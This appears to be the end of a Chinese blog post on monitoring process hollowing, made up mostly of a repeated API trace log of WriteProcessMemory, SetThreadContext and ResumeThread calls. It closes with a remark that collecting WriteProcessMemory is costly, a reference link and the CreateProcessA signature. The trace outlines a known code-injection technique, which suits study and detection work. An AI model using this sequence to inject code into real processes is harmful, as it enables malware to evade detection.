25 ms WriteProcessMemory()
25 ms | WriteProcessMemory()
25 ms WriteProcessMemory()
25 ms | WriteProcessMemory()
25 ms WriteProcessMemory()
25 ms | WriteProcessMemory()
25 ms WriteProcessMemory()
25 ms | WriteProcessMemory()
25 ms WriteProcessMemory()
25 ms | WriteProcessMemory()
25 ms WriteProcessMemory()
25 ms | WriteProcessMemory()
25 ms WriteProcessMemory()
25 ms | WriteProcessMemory()
25 ms WriteProcessMemory()
25 ms | WriteProcessMemory()
25 ms WriteProcessMemory()
25 ms | WriteProcessMemory()
25 ms WriteProcessMemory()
25 ms | WriteProcessMemory()
25 ms WriteProcessMemory()
25 ms | WriteProcessMemory()
25 ms WriteProcessMemory()
25 ms | WriteProcessMemory()
25 ms WriteProcessMemory()
25 ms | WriteProcessMemory()
25 ms WriteProcessMemory()
25 ms | WriteProcessMemory()
25 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms WriteProcessMemory()
26 ms | WriteProcessMemory()
26 ms SetThreadContext()
26 ms | SetThreadContext()
26 ms | SetThreadContext thread handle:0x2e0 int32:736
27 ms ResumeThread()
27 ms | ResumeThread()
27 ms | ResumeThread thread handle:0x2e0 int32:736
所以采集writeprocess memory这个API要非常谨慎。尽量不要做采集。
参考:
https://medium.com/@s12deff/process-hollowing-ac7e507bec3e
BOOL CreateProcessA( [in, optional] LPCSTR lpApplicationName, [in, out, optional] LPSTR lpCommandLine, [in, optional] LPSECURITY_ATTRIBUTES lpProcessAttributes, [in, optional] LPSECURITY_ATTRIBUTES lpThreadAttributes, [in] BOOL bInheritHandles, [in] DWORD dwCreationFlags, [in, optional] LPVOID lpEnvironment, [in, optional] LPCSTR lpCurrentDirectory, [in] LPSTARTUPINFOA lpStartupInfo, [out] LPPROCESS_INFORMATION lpProcessInformation );
浙公网安备 33010602011771号